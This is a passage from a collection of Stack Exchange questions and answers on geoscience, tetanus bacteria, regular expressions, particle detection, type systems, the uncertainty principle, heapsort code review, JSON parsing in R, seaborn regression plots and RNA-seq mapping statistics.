depth of analysis, and (arbitrary) shear-wave velocity contour. Via Monte Carlo simulations he rules out hotspots being drawn from the margins of the Pacific LLSVP, but cannot rule out the possibility that hotspots are preferentially drawn from the entire areal extent of LLSVPs in both the Pacific and the Atlantic. RD & his team conclude that present-day hotspot locations are controlled by ancient subduction, rather than the current margins of LLSVPs - which are demonstrated via dynamical simulations to be mobile, even in the presence of dense chemical heterogeneity. (As a side note, both "hotspots" and "mantle plume" are contested terminology, it's true - but the vast majority of geoscientists believe that mantle plumes do exist. There is complexity to that view, in that the consensus does not require all intraplate volcanism to be the result of atypically hot mantle -- but the idea that mantle plumes simply do not exist, as espoused by mantleplumes.org, does not have wide acceptance.)
{ "domain": "earthscience.stackexchange", "id": 71, "tags": "plate-tectonics, volcanoes, mantle, convection, mantle-plumes" }
How can Clostridium tetani proliferate in relatively minor wounds?
Question: It is often reported (NIH) that some of the most common infections by Clostridium tetani are in minor wounds where, in theory, blood (hence oxygen) supply should not be completely disrupted. How can this obligate anaerobic bacillus proliferate in such conditions? Are concomitant necrotizing infections (such as, for example, Staphylococcus aureus) to blame? Answer: Nondisruption of blood supply seems to be a heuristic/rule of thumb/approximation of the survival of oxygen supply to tissue in and around a "minor" wound. What I mean is, it's not a 100% confirmation of persistent oxygenation, especially if we consider every relevant locus at the wound site. Remember we're talking of microbes here and at that scale, anerobic pockets can exist even in the presence of macroscopically visible redness/bleeding/oozing (signs of good circulation) and that's all clostridium tetani needs to proliferate, synthesize and release its deadly toxin.
{ "domain": "biology.stackexchange", "id": 12427, "tags": "bacteriology, medicine" }
Is it possible to build any regular expression in a computer language with just 3 basic operators?
Question: Many computer languages have complex regular expressions tools. For example, in Javascript you have global flags, escape characters, whitespace character, assertions, character classes, groups and ranges etc. I'm wondering if using just the 3 basic regular expressions operators as defined in formal languages, that is concatenation, alternation and Kleene star can achieve the same result as any pattern described with more tools as for example in Javascript. Is there a theorem about this? Answer: Regular expressions using only concatenation, alternation and Kleene star describe regular languages. In contrast, extended regular expressions available in modern programming languages can describe non-regular languages. For example, (.*)\1 describes the language $\{ ww : w \in \Sigma^* \}$, which is not even context-free.
{ "domain": "cs.stackexchange", "id": 18856, "tags": "regular-languages, regular-expressions" }
Detection of charged particle in optical fiber cable
Question: There is a charged particle source and a light source attached to optical fiber cable which is attached to a light detector. Is it possible to detect the passage of a charge particle through the cable due to change in the light (from the light source) that is received by the light detector? If yes, how does the detection/signal depends on particle energy and light wavelength ? Google search gave me papers that are related to light induced in optical fiber by a charged particle e.g. https://iopscience.iop.org/article/10.1088/1742-6596/732/1/012005/pdf. Also, I tried looking here on Stack but could not find anything similar. Thank you. Answer: In general, charged particles going through a transparent medium with velocity higher than the velocity of light in the medium generate Cerenkov radiation which is the method used to detect neutrinos,by neutrino interactions in many large scale experiments giving rise to fast charged particles. Now a fiber is transparent to light and if a fast electron goes through there will be radiation, but if there is light going already through the fiber there will be superposition and a need to unravel the signal from the steady state. The paper you quote is not talking of Cerenkov light, but of an effect due to the dipoles interaction with the charged particle, for very thin fibers.It sounds interesting and it seems to be designed for accelerator beams control. Try the CERN document server to see whether this research is pursued.
{ "domain": "physics.stackexchange", "id": 67054, "tags": "particle-physics, photons, experimental-physics, particle-detectors, optical-materials" }
Confusion about data types, compilers, hardware data representation and static vs dynamic typing
Question: I am trying to understand static vs dynamic typing, but am really struggling to see how everything fits together. It all starts with data types. As far as I understand, data types are quite abstract notions, which exist 'in' compilers in order to categorise data so that the operations on various types of data can be validated (i.e. in an attempt to stop you adding a string to an integer), and in order to generate the right machine code for the hardware interpretation of the value. I.e. say we have the following: int myInt = 5; char myChar = '5'; Console.WriteLine(myInt); Console.WriteLine(myChar); Both would ultimately write a five to the console window, but, since the representations in memory of integers and characters are different, the machine code which interprets the value in the memory location bound to the variable myInt, which takes that value and displays it on the console window, would be different to the machine code for myChar. Even though Console.WriteLine() 'does the same job', the different representations of five require different low level code. So my question is this: if data types 'exist only in the compiler' - i.e. once the program has been compiled into machine code there is no knowledge of what type of data the value in a particular memory cell is (everything is just 1s and 0s) - then how can any type-checking be done at runtime? Surely there is no concept of data types at run time? So surely dynamic typing can't be anything to do with type-checking occurring at run time? Where is my understanding going wrong, and could somebody please explain static and dynamic typing with respect to the argument given above? What is the big picture of what is going on? I am trying to understand this for an essay, so references to books or online sources would be useful :) Thank you. Answer: First, you must be aware that computer science is full of terms which have multiple, related but conflicting definitions. The fact that two authors are using the same term such as "type" does not mean they are using the same definition and thus there may be inconsistencies if you are not careful when you try to combine different sources. A type is a property attached to entities (values, variables, ...) which allow to know what operations are allowed on those things and what is the result of those operations (including the type of the result). That means that type determines the interpretation of the bits pattern representing a value, but that's not the only effect of types. It is common to introduce several types which gives the same meanings to bits patterns, just to prevent to use them in some context (an extreme example would be to have different types for X and Y coordinates to be sure they are not swapped at the wrong time). A language may be: statically typed: an analysis of the program allows to know the type of an entity without the need to execute it (that is what you were thinking about). That is common for languages which are compiled. dynamically typed: value carries information about their type. Choices which need that information must be done at execution time, looking at the information attached to the value at hand. That is common for languages which are interpreted. untyped: operations assume that their arguments are correct (note that this is different from implicit conversions, implicit conversions tries to conserve a notion of value, in an untyped language that does not happen), there is no typing error (but an argument may be invalid and trigger an error) nor choice of behavior depending on types. Nowadays the more common languages which are untyped are the assembly languages. Historically languages like BLISS and BCPL were also in that class. The original TCL language was also in that class. Note that it is quite common for languages to have aspects of several kinds. C++ for instance has a notion of static type which determines some things such as overload resolution, a notion of dynamic type which determines other things such as virtual function dispatch and reinterpret_cast allows to circumvent the typing system and behave in an untyped way. A language may be defined in a dynamic way, as if the values carried the type information, but a compiler may analyze a program and remove part of the checks that would be needed and even remove the need to attach a dynamic type information on some values. And a language may have types (static or dynamic) but be used in an untyped way (Lisp variants often have a notion of dynamic type, but lists are also often used to represented everything not built-in). So my question is this: if data types 'exist only in the compiler' I've tried to show that this assumption is false. It may be true for some languages, but others attach type information to values (and that's the case for object oriented one -- I've in the past described OO as a way to get the benefits of dynamic typing without dropping completely the benefits of static typing --, if there is a dynamic dispatch based on type, you need to have dynamic type information). Note that the information may be part of the value as a tag, as a pointer to a type-descripting data structure (the vptr of common implementation of C++), or even implicitly (that area of memory is used only to store values of that type, the bits don't have to show what type is the value, the place where they are is giving the information). References Types and Programming by B. Pierce (but IIRC it is strongly oriented towards static typing) Concepts, Techniques, and Models of Computer Programming by P. van Roy and Seif Haridi, wider of scope but also more oriented towards dynamic typing and may also be useful to organize things before a reference such as B. Pierce which is more concerned about just typing issues.
{ "domain": "cs.stackexchange", "id": 5637, "tags": "compilers, type-checking, typing" }
Charging an object by induction
Question: when charging a sphere by induction using a (-) charged object , and we put it to the right side of the sphere, electrons are pushed to the left side , so we ground the left side and the excess electrons escape. but what if we grounded the right side ( which has less electrons than usual ) wouldn't electrons flow from the ground to neutralise this side? Answer: While you keep the (-) charged object near the sphere, the electrons that'll flow from ground to neutralise the right side will also get pushed towards the left side, though the proportion might vary. That's what I thought. But here's another logic. If the (-) charged object can push incoming electrons from the ground to the left side of the sphere, it can also push them down to the ground i.e. it will never let the ground donate electrons to the sphere via right side due to electrostatic repulsion. Answer: No, nothing will happen if you try to ground the right side. No neutralization, no -ve charging. I suggest you try this out. It would be a fun experiment.
{ "domain": "physics.stackexchange", "id": 34952, "tags": "electrostatics" }
Would life (as we know it) be possible without the weak interaction?
Question: I understand why the strong interaction is important in everyday life (it holds nuclei together and also allows the fusion reactions that power the Sun) and also why the electromagnetic interaction is important (it holds atoms together, among too many other effects to mention). But while I'm sure that the universe would be profoundly different at the macroscopic level if there were no weak interaction, I can't think of a reason why. (Well, I guess it would be a whole lot harder to persuade the NSF to fund neutrino detection experiments...) The weak force affects the amplitudes of scattering processes that don't involve external neutrinos via virtual effects, but are these important enough to qualitatively change the macroscopic physics? (I guess you need the full "pre-symmetry-breaking" unified electroweak interaction in order to get the Higgs mechanism and give particles mass, but is the weak interaction still qualitatively important after symmetry breaking?) Answer: Thanks everyone for lots of good responses - I'm going to summarize them here for future convenience. It looks like there's no consensus on this issue, but here are some takeaways on two variants of my question: If the weak interaction were to suddenly "turn off" with the universe in its current condition, then solar fusion would stop and we'd all be pretty screwed (although it's not like we'd be instantly blown to bits, like we would if, say, the strong interaction were to suddenly turn off). If the weak interaction had never existed in the first place, then the Universe might have been able to evolve into one closely resembling our own if the baryon/photon ratio were sufficiently low during Big Bang nucleosynthesis. It also might still have the observed strong matter/antimatter abundance asymmetry. But it's controversial whether these initial conditions would have led to sufficient production of heavy elements during supernovas. And even if planets with chemical composition similar to Earth's did form, their cores would probably be much colder than Earth's, possibly leading to much less tectonic activity and/or geomagnetic radiation shielding, which could make advanced life less likely to evolve.
{ "domain": "physics.stackexchange", "id": 31486, "tags": "everyday-life, weak-interaction, electroweak" }
What temperature is required to burn pencil lead graphite?
Question: I tried to burn a bunch of 8B pencil lead in a gas flame the other day. None of it actually caught fire, but being made of carbon (in the form of graphite) should cause it to burn, as graphite is essentially purified coal. What temperature is required to set it burning, and is extra oxygen required? Answer: You have two problems. 1.) pencil lead graphite is actually a graphite-clay composite. 2.) carbon does not sustain burning easily unless it is held at very high temperatures. Pencil lead will not burn effectively for the first reason as clay is non-combustible and smothers any fire load. If you did have pure graphite to burn, a simple flame wouldn't be hot enough to combust it. You need to sustain temperatures of around $1000\mathrm{-}2000~^\circ\mathrm{C}$ in order for pure carbon to burn.
{ "domain": "chemistry.stackexchange", "id": 9109, "tags": "heat, combustion" }
From uncertainty to commutation relations
Question: Consider the famous problem of measuring both the position and momentum of an electron. We start with two photographs at different times, then worry about the momentum of the photon, the wavelength of the light, the aperture of the camera etc. We end up with the classical uncertainty relations; well actually a bit more: we have an idea of the signs of the errors (e.g. we know on which side the electron was hit by the photon). Now suppose that we have an idea that the measurements are made by application of SOME operators (not necessarily the standard ones) on a Hilbert space. Can we deduce anything like the canonical commutation relations between position and momentum operators? In other words, is the implication between commutation and order of measurement only one way (the commutation relations are consistent with the measurements), or can we give a limited implication the other way? The interest is with novel quantum systems - if there is an idea how measurement theory works, then is this any guide to the algebra of observables? (As well as being of general historical or philosophical interest in whether quantum theory might have taken another turn using different operator representations.) Answer: The uncertainty principle between two observables is related to their commutator in a general and profund way. The generalized uncertainty principle can be proved quite generally using simple matrix algebra and the Cauchy-Schwartz Inequality: I) Supose we have two hermitian operators (aka observables) $\hat{A}$ and $\hat{B}$. The possible results of a measurment are their eivenvalues and the dispersion in the measurment is: \begin{equation} ({\Delta\hat{A}})^2 = \langle\hat{A}^2\rangle-\langle\hat{A}\rangle^2 \end{equation} We can calways chose a new reference system to set $<\hat{A}>=0$ so we get: \begin{equation} ({\Delta\hat{A}})^2 = \langle\hat{A}^2\rangle = \int\psi^*\hat{A}^2\psi dx =\langle\psi|\hat{A}^2|\psi\rangle \end{equation} And obviusly the same holds for $\hat{B}$. II) Using the Cauchy-Schwartz Inequality: \begin{equation} \langle\psi|\hat{A}\hat{A}|\psi\rangle\langle\psi|\hat{B}\hat{B}|\psi\rangle \geqslant |\langle\psi|\hat{A}\hat{B}|\psi\rangle|^2 \end{equation} One can inmediately obtain: \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant |\langle\psi|\hat{A}\hat{B}|\psi\rangle|^2 \end{equation} III) Now,we can reduce the term in the right \begin{equation} |\langle\psi|\hat{A}\hat{B}|\psi\rangle| \geqslant |Im\Big[\langle\psi|\hat{A}\hat{B}|\psi\rangle \Big] = |\frac{1}{2i}\Big[\langle\psi|\hat{A}\hat{B}|\psi\rangle - \langle\psi|\hat{A}\hat{B}|\psi\rangle^* \Big]| \end{equation} Where I have used that the modulus of a complex number is bigger than its Imaginary part and then I used the fact that if $f= Re(f)+i Im(f)$ then $Im(f)=\frac{1}{2i}(f-f^*)$. IV) Because $\hat{A}$ and $\hat{B}$ are observables then $\langle\psi|\hat{A}\hat{B}|\psi\rangle^*=\langle\psi|(\hat{A}\hat{B})^{\dagger}|\psi\rangle=\langle\psi|(\hat{B}\hat{A})|\psi\rangle$ V) Finally, using this result we can rewrite the inequality as: \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant |\frac{1}{2i}\Big[\langle\psi|\hat{A}\hat{B}|\psi\rangle - \langle\psi|\hat{B}\hat{A}|\psi\rangle \Big]| =|\frac{1}{2i}\Big[\langle\hat{A}\hat{B}\rangle - \langle\hat{B}\hat{A}\rangle \Big] |=|\frac{1}{2i}\langle[\hat{A},\hat{B}]\rangle| \end{equation} So the dispersion in any two hermitian operators is related to their commutator \begin{equation} ({\Delta\hat{A}})^2({\Delta\hat{B}})^2 \geqslant|\frac{1}{2i}\langle[\hat{A},\hat{B}]\rangle| \end{equation} I suppose that you could measure the dispersion of two observables with increasing accuracy to find some upper limmit on their commutator. Note that this work for any two observables you like to use, not just canonical ones like X and P.
{ "domain": "physics.stackexchange", "id": 39838, "tags": "quantum-mechanics, heisenberg-uncertainty-principle, measurement-problem, commutator, observables" }
Maxwell equations
Question: $$\oint B.dl = \mu_0\left(I+\epsilon_0\frac{\partial\Phi_E}{\partial t}\right)$$ Please explain the applications , and implications of the modified Ampere's circuital law with Maxwell's addition. Especially, significance of Maxwell's work Answer: See my answer here: Maxwell's big contribution was the notion of displacement current, which then changed the equations of electromagnetism in a way that foretold electromagnetic radiation whereby the Cartesian components of the fields all fulfilled D'Alembert's Wave equation and moreover that the wavespeed $c$ would be $c = 1/\sqrt{\mu_0\,\epsilon_0}$. The latter's ($c$, that is) surprising nearness to the experimentally known value as found by the Fizeau experiment led Maxwell to assert that light is one such electromagnetic wave. Historians of physics widely consider that Maxwell's foretelling was first vindicated by the Hertz Spark Gap experiment. So, without being too glib, the great J C Maxwell's main gig was the second term on the right hand side of your equation.
{ "domain": "physics.stackexchange", "id": 14366, "tags": "electromagnetism, maxwell-equations" }
Are elementary particles ultimate fate of black holes?
Question: From the "no hair theorem" we know that black holes have only 3 characteristic external observables, mass, electric charge and angular momentum (except the possible exceptions in the higher dimensional theories). These make them very similar to elementary particles. One question naively comes to mind. Is it possible that elementary particles are ultimate nuggets of the final stages of black holes after emitting all the Hawking radiation it could? Answer: This is indeed a tempting suggestion (see also this paper). However, there is a crucial difference between elementary particles and macroscopic black holes: the latter are described, to a good approximation, by non-quantum (aka classical) physics, while elementary particles are described by quantum physics. The reason for this is simple. If the classical radius of an object is larger than its Compton wavelength, then a classical description is sufficient. For black holes whose Schwarzschild radius is bigger than the Planck length this is fulfilled. However, for elementary particles this is not fulfilled (e.g. for an electron the "radius" would refer to the classical electron radius, which is about $10^{-13}$cm, whereas its Compton wavelength is about three orders of magnitude larger). Near the Planck scale your intuition is probably correct, and there is no fundamental difference between black holes and elementary particles - both could be described by certain string excitations.
{ "domain": "physics.stackexchange", "id": 574, "tags": "general-relativity, particle-physics, black-holes" }
Heapsort is not modular
Question: For the time being, I am not interested in any recursive solution. The code is not modularized; the whole body is inside the main function. #include<iostream.h> #include<stdlib.h> /*This code is written by NF between any time of 120711 and 210711;modified at 231211*/ int main() { int length=0,min_heapified=0,start_length=0,index=0; cout<<"Enter Array Length:"; cin>>length; int array[length]; for(int i=0;i<length;i++) { array[i]=rand()%100; } cout<<"Array is filled now with random elements"; cout<<"\nSorted Array:"<<endl; do { do { min_heapified=0; for(int root=0;root<length/2;root++)/*As the leaf nodes have no child they should not be in a consideration while swapping so looping upto length/2 is enough*/ { int left=((2*root)+1); int right=((2*root)+2); if(left<length) { if(array[left]<array[root]) { int swap=array[left]; array[left]=array[root]; array[root]=swap; min_heapified=1; } } if(right<length) { if(array[right]<array[root]) { int swap=array[right]; array[right]=array[root]; array[root]=swap; min_heapified=1; } } } }while(min_heapified>0); int swap=array[0]; array[0]=array[--length];/*modification done at this point to avoid keeping the sorted elements into another array;and swapping done between the 0th and last element*/ array[length]=swap; cout<<array[length]<<" "; }while(length>0); return 0; } Answer: The other answers cover the stylistic concerns of your code pretty well already. However, there is still one major issue with your code that warrants another (albeit late)answer: it's incorrectly implemented! The "heapsort" algorithm that you implemented has a run-time complexity of O(N2). Judging from your comment, you probably realized something was wrong too since the run-time sky-rocketed as you tried to sort more items. Here are the problem areas I see that's causing the abysmal performance: You are re-heapifying the entire array on each iteration. This is of course completely wrong and it's the biggest reason why your code is performing so poorly. You're only suppose to heapify the array once, at the beginning when you start the sort. Shifting all the elements down by one after removing the smallest. This is an O(N) operation that can be avoided altogether with a redesign. Use of a temp array -- this is also unnecessary. Like quicksort, one of heapsort's advantages is that it's capable of sorting in-place without the need to allocate a temporary buffer. Heapifying 'leaf' elements needlessly. By definition, leaf elements don't have any child nodes below them so there's nothing to push down. Therefore, it doesn't make sense to heapify pass the last parent element. In other words, you should be going from root = 0 to root < (length / 2). Going pass length / 2 will just result in unnecessary comparisons: left < length and right < length will always be false. It's typical to write 2 helper functions when implementing heapsort: heapify that turns the array into a heap, and a push_down or filter_down function to enforce the heap property for the element passed in. You usually implement heapify with the help of the filter function. Note that the stl has heap functions that does exactly those tasks: push_heap, pop_heap and make_heap. I'll leave the utility functions for you to figure out but here's how the top view of heapsort should look: void heapsort(int *begin, int *end) { // assume end is one pass the last element. eg. arry + length; heapify(begin, end); while(begin != --end) { swap(*begin, *end); // invariant: the next item to order will be at the top // after the swap, the next biggest/smallest item may not be // at the top. use push_down to fix this and preserve the heap property. push_down(begin, end); } } Note that you do not call heapify inside the loop. After the swap, only the top element might violate the heap property -- the rest of the remaining elements are still in a heap. To fix the top you just need to push_down that element until it reaches the right level. This can be done in O(log n) since that's how deep the tree can ever be. Edit: Added more explanation and example. An analogy might help clear up the idea behind heapsort. You can think of heapsort as hosting an elimination tournament where in each match-up bracket 3 contenders duke it out. The winner will move up the bracket to the next match-up and the 2 losers stay where they are. The tournament starts out by doing all the match-ups at the bottom bracket first, progressively moving up -- this is basically the heapifying phrase. After you heapify, that's finishing one entire tournament -- the champion is at array[0] and the runner-ups will be either array[1] or array[2]. To find the runner-up you host another match-up between them plus a 3rd contender from the bottom bracket. Now if you think of 'push_down' as a sort of scorekeeper, his job is to keep track of the winners and move them up the bracket + what match-ups need to take place. Each match-up has 1 'defender'(the guy one bracket up) and 2 'challengers'. If the defender loses, he swaps places with the challenger that defeated him. If there are more challengers below the defender's new spot, another match-up is between them. The defender will get pushed further and further down the match-up bracket until he can successfully defend his spot or there are no more opponents to defend against. The 'push_down' function is probably the most important helper since that's where the reordering actually happens. It's almost analogous to partition in qsort or merge in mergesort. Here's basically what the push_down function would look like: (note, it's not thoroughly tested) void push_down(int *begin, int *end, size_t defender = 0) { // at the very bottom? if(defender >= std::distance(begin, end) / 2) return; size_t challenger = defender * 2 + 1; // is there a right-child? // Note that in even# arrays, last parent doesn't have a right child if(begin + challenger + 1 != end) if(begin[challenger + 1] < begin[challenger]) ++challenger; // defended successfully? if( !(begin[challenger] < begin[defender]) ) return; // challenger wins std::swap(begin[challenger], begin[defender]); push_down(begin, end, challenger); } Note that the array will be sorted in descending order if smallest is at the top. But this is trivial to fix once sorting is working -- just flip the comparison being done. You should heed the advice from the other answers and extract out those functions. It will make your code easier to reason about.
{ "domain": "codereview.stackexchange", "id": 13415, "tags": "c++, algorithm, sorting" }
Products of the reaction between chromium(III) chloride, zinc and sulfuric acid
Question: The aim of my experiment was to make a Cr(II) aquacomplex in situ, and for that I have the reaction: $$\ce{CrCl3·6H2O + Zn}$$ and I add concentrated sulfuric acid to it. I know that chromium(III) reduces to chromium(II), but I'm not sure about the reaction. Would it be $$\ce{CrCl3·6H2O + Zn -> Cr(H2O)6Cl2 + ZnCl + H2}?$$ Answer: I know that chromium(III) reduces to chromium(II), but I'm not sure about the reaction. Would it be $$\ce{CrCl3·6H2O + Zn -> Cr(H2O)6Cl2 + ZnCl + H2}?$$ Your concept is right and I am glad nobody taught you the concept of nascent hydrogen. It is an obsolete idea of the 1920-40s. Please don't use it anywhere. Wikipedia has a nice summary https://en.wikipedia.org/wiki/Nascent_hydrogen and of course there are several articles which negate this very concept. You can just simply write the ionic equation involving Cr(III), Zn, resulting in Cr(II) and Zn(II). Hydrogen is just a side-product, which is not participating in the reaction. Write the conditions over the arrow. Alternatively, write the aquated forms as a complex. Your current equation has incorrect formula of zinc salt. Check what it should be!
{ "domain": "chemistry.stackexchange", "id": 12193, "tags": "inorganic-chemistry, aqueous-solution, coordination-compounds, transition-metals" }
Parsing data from a string
Question: I think this is something that experienced programmers do all the time. But, given my limited programming experience, please bear with me. I have an excel file which has particular cell entries that read [[{"from": "4", "response": true, "value": 20}, {"from": "8", "response": true, "value": 20}, {"from": "9", "response": true, "value": 20}, {"from": "3", "response": true, "value": 20}], [{"from": "14", "response": false, "value": 20}, {"from": "15", "response": true, "value": 20}, {"from": "17", "response": false, "value": 20}, {"from": "13", "response": true, "value": 20}]] Now, for each such entry I want to take the information in each of the curly brackets and make a row of data out of it. Each such row would have 3 columns. For example, the row formed from the first entry within curly brackets should have the entries "4" "true" and "20" respectively. The part I posted should give me 6 such rows, and for n such repetitions I should end up with a matrix of 6n rows, and 4 columns ( an identifier, plus the 3 columns mentioned). What would be most efficient way to do this? By "doing this" I mean learning the trick, and then implementing it. I have access to quite a few software packages(Excel, Stata, Matlab, R) in my laboratory, so that should not be an issue. Answer: If you have R is quite simple Copy the lines into a file, let's say: "mydata.json" Be sure you have installed the rjson package install.packages("rjson") Import your data library("rjson") json_data <- fromJSON(file="mydata.json")
{ "domain": "datascience.stackexchange", "id": 154, "tags": "parsing" }
Turing machine and language decidability
Question: The document I am reading is here: Turing Machines Before getting into the question, here is the notation used on the picture: Here $\Delta$ denotes the blank and R, L and S denote move the head right, left and do not move it, respectively. A transition diagram can also be drawn for a Turing machine. The states are represented by vertices and for a transition $\delta( q, X ) = ( r, Y, D )$ , where D represents R, L or S , an arc from q to r is drawn with label ( X/Y , D ) indicating that the state is changed from q to r, the symbol X currently being read is changed to Y and the tape head is moved as directed by D. According to the document: A Turing machine T is said to decide a language L if and only if T writes "yes" and halts if a string is in L and T writes "no" and halts if a string is not in L Here is the three examples: Case 1: Case 2: Case 3: I just want to verify my understanding. According to the definition, in case 1 and case 2, its turing machines cannot decide because the machines cannot tell whether invalid inputs rather than { a } (such as aa, aaa, aaaa....) is in L or not. In case 2, if another a appears after the first a, or if the input is empty, the machine goes to state S and loop forever. In case 3, if a is detected and only a single a exists, that a is replaced by 1 and the machine accepts. Otherwise, a 0 is replaced and the input is decided not in the language. Am I correct on all of these? However, in case 3, what if I give any input which contains other character rather than a (such as string ab, bc...)? Or is it said that TM decides only languages over a set of alphabet $\Sigma$ allowed by the Turing Machine? If a string which is longer than a single a (like aa, aaa,ab,bc...), the machine may loop forever (like in case 2) or halt without accepting (in other words, it is "crashed", where it does not have transition rules for a symbol in the input such as b in the case of above Turing Machines). Is this correct also? Answer: A TM decides a language if it enters the accepting state for word in the language and it enters the rejecting state if it is not. Thus it halts on all inputs. Note the machines defined above are not entirely standard. They way they denote acceptance and reject is by writing a $1$ or $0$ and then by entering a halting state. This is equivalent to the standard definition, but less elegant. Machine 1 does not reject words not in the language. It only accepts the language. Machine 2 does not halt for words not in the language. It only accepts the language. Machine 3 rejects and hence halts for words not in the language, therefore it decides the language.
{ "domain": "cs.stackexchange", "id": 273, "tags": "computability, turing-machines" }
Why $e$ in the formula for air density?
Question: I am reading a book that says that the density of air is approximately $D = 1.25 e^{(-0.0001h)}$, where h is the height in meters. Why is Euler's number $e$ used here? Was a differential equation used in deriving this formula? Answer: It's actually a surprisingly straightforward differential equation. If you assume that the acceleration due to gravity $g$ doesn't change with altitude (a good approximation if the atmosphere is thin compared to the radius of the earth), Bernoulli's relation tells you the change in the pressure $P$ with height $h$: $$ \frac{dP}{dh} = -\rho g$$ Meanwhile the pressure and the density are also related by the ideal gas law $$ PV = NRT $$ or $$ P = \rho \frac{RT}{M} $$ where $M$ is the mass of one mole of the gas. If you're willing to neglect the changes in temperature $T$ and mean molar mass $M$, you can differentiate with respect to height and find \begin{align} \frac{dP}{dh} = \frac{d\rho}{dh} \frac{RT}M &= -\rho g \\ \frac{d\rho}{dh} &= -\rho \frac{gM}{RT} = -\frac{\rho}{h_0} \end{align} This is the classic differential equation for an exponential. If I use nice round numbers $R=8\,\mathrm{\frac{J}{mol\cdot K}}$, $T=300\,\mathrm K$, $M=30\,\mathrm{g/mol}$, $g=10\,\mathrm{m/s^2}$, I get a scale height of 8000 meters, different from your textbook's approximation of $10^4$ meters by about 20%.
{ "domain": "physics.stackexchange", "id": 14617, "tags": "air, atmospheric-science, density" }
Drawing a regression line with a timeseries
Question: My code is using seaborn to draw a regression line with a timeseries data as the x axis, and whatever you want the y-axis to be. Since seaborn does not support this function directly, a dummy column has to be made first based on the timeseries (i.e. instead of using 2016-05-01, use 1,2,3,4,5... to represent the date. Then, plot the regression line using 1,2,3... as the x-axis and replace the 1,2,3 label with 2016-05-01, 2016-05-02... def regplot_timeseries(df:pd.DataFrame, time_col:str, data_col:str, figsize=(14, 6), xlabel = '', ylabel = ''): # make a copy of the incoming data (think of the incoming data as an excel sheet visually) dfc = df.copy() # if it is a index, treat it slightly differently # add a column to the copy of the excel sheet for plotting purpose if time_col == 'index': dfc = dfc.sort_index() dfc['date_f'] = pd.factorize(dfc.index)[0] + 1 mapping = dict(zip(dfc['date_f'], dfc.index.date)) else: dfc = dfc.sort_values(time_col_str) dfc['date_f'] = pd.factorize(dfc[time_col])[0] + 1 mapping = dict(zip(dfc['date_f'], dfc[time_col].dt.date)) # plotting fig, ax = plt.subplots() fig.set_size_inches(figsize[0], figsize[1]) sns.regplot('date_f', data_col, data=dfc, ax=ax) labels = pd.Series(ax.get_xticks()).map(mapping).fillna('') ax.set_xticklabels(labels) ax.set_xlabel(xlabel) ax.set_ylabel(ylabel) # delete the copy to free up memory del dfc I am new to functional programming, and from what I read, I shouldn't alter the data being passed in. In this case, I shouldn't alter df, so I made a copy instead and deleted the copy at the end of the function. Is this the right to do it? Answer: You don't need dfc, dfc.sort_index() and dfc.sort_values(time_col_str) both make a copy of the data. They don't perform an in-place sort. del dfc isn't needed, Python will perform that action at the end of the function anyway. Also I don't think it's doing what you think it's doing. I may be wrong, but since variables in Python are like names, when you're using del, you're just removing one name tag to the object. Deletion of a name removes the binding of that name from the local or global namespace, depending on whether the name occurs in a global statement in the same code block. In my personal opinion, Python doesn't lend itself well to functional programming. Yes you can do FP in it, but it tends to start looking very ugly very fast. Don't care about whether something is FP or not, just make it work. I don't really know what your code is doing, but the if-else and the 'plotting' should probably be in two separate functions.
{ "domain": "codereview.stackexchange", "id": 25940, "tags": "python, functional-programming, pandas, data-visualization" }
Mapping statistics from bam file using bbtools and sambamba
Question: Below are the statistics for RNA-seq mapped and unmapped paired-end reads to rice genome using reformat.sh from bbtools on bam files. It gives 77% mapped and 5% unmapped, what about the remaining 18% reads? How I can get information for all reads? Command; reformat.sh in=Leaf_T1_F_R10_S1_L001.bam out=Leaf_T1_F_R10_S1_L001.mapped.bam, mappedonly Unspecified format for output Leaf_T1_F_R10_S1_L001.mapped.bam,; defaulting to fastq. Found sambamba. Input is being processed as unpaired Input: 67471075 reads 9312399845 bases Output: 52020538 reads (77.10%) 7208830835 bases (77.41%) Time: 171.212 seconds. Reads Processed: 67471k 394.08k reads/sec Bases Processed: 9312m 54.39m bases/sec For unmapped read; Command; reformat.sh in=Leaf_T1_F_R10_S1_L001.bam out=Leaf_T1_F_R10_S1_L001.unmapped.bam, unmappedonly Unspecified format for output Leaf_T1_F_R10_S1_L001.unmapped.bam,; defaulting to fastq. Found sambamba. Input is being processed as unpaired Input: 67471075 reads 9312399845 bases Output: 3435326 reads (5.09%) 465456267 bases (5.00%) Time: 142.978 seconds. Reads Processed: 67471k 471.90k reads/sec Bases Processed: 9312m 65.13m bases/sec With sambamba; Can I say 94.91% reads are mapped and 5.09% are unmapped? 67471075 + 0 in total (QC-passed reads + QC-failed reads) 12015211 + 0 secondary 0 + 0 supplementary 0 + 0 duplicates 64035749 + 0 mapped (94.91%:N/A) 55455864 + 0 paired in sequencing 27727932 + 0 read1 27727932 + 0 read2 51006046 + 0 properly paired (91.98%:N/A) 51419222 + 0 with itself and mate mapped 601316 + 0 singletons (1.08%:N/A) 263816 + 0 with mate mapped to a different chr 237111 + 0 with mate mapped to a different chr (mapQ>=5) Answer: Try samtools flagstat or sambamba flagstat to get similar type of information about your bam file. It may be easier to interpret. Both of these tools can be installed using conda if needed. EDIT: Yes, the results of sambamba flagstat you showed in your edited post indicate exactly what you said: 94.91% mapped and 100% - 94.91% = 5.09% unmapped: 64035749 + 0 mapped (94.91%:N/A)
{ "domain": "bioinformatics.stackexchange", "id": 1575, "tags": "rna-seq, samtools, bash, java, sambamba" }
Slit screen and wave-particle duality
Question: In a double-slit experiment, interference patterns are shown when light passes through the slits and illuminate the screen. So the question is, if one shoots a single photon, does the screen show interference pattern? Or does the screen show only one location that the single photon particle is at? Answer: The answer is yes to both questions: yes, the screen does show one location for one particle and yes, the accumulated picture after repeating the experiment many, many times does show the interference pattern. There is a set of beautiful pictures and a video of the double slit experiment in one-particle-per-time mode that can be found here (the experiment is with electron but conceptually there is no difference).
{ "domain": "physics.stackexchange", "id": 4615, "tags": "quantum-mechanics, photons, double-slit-experiment, wave-particle-duality" }
Is this basic gene diagram correctly labeled?
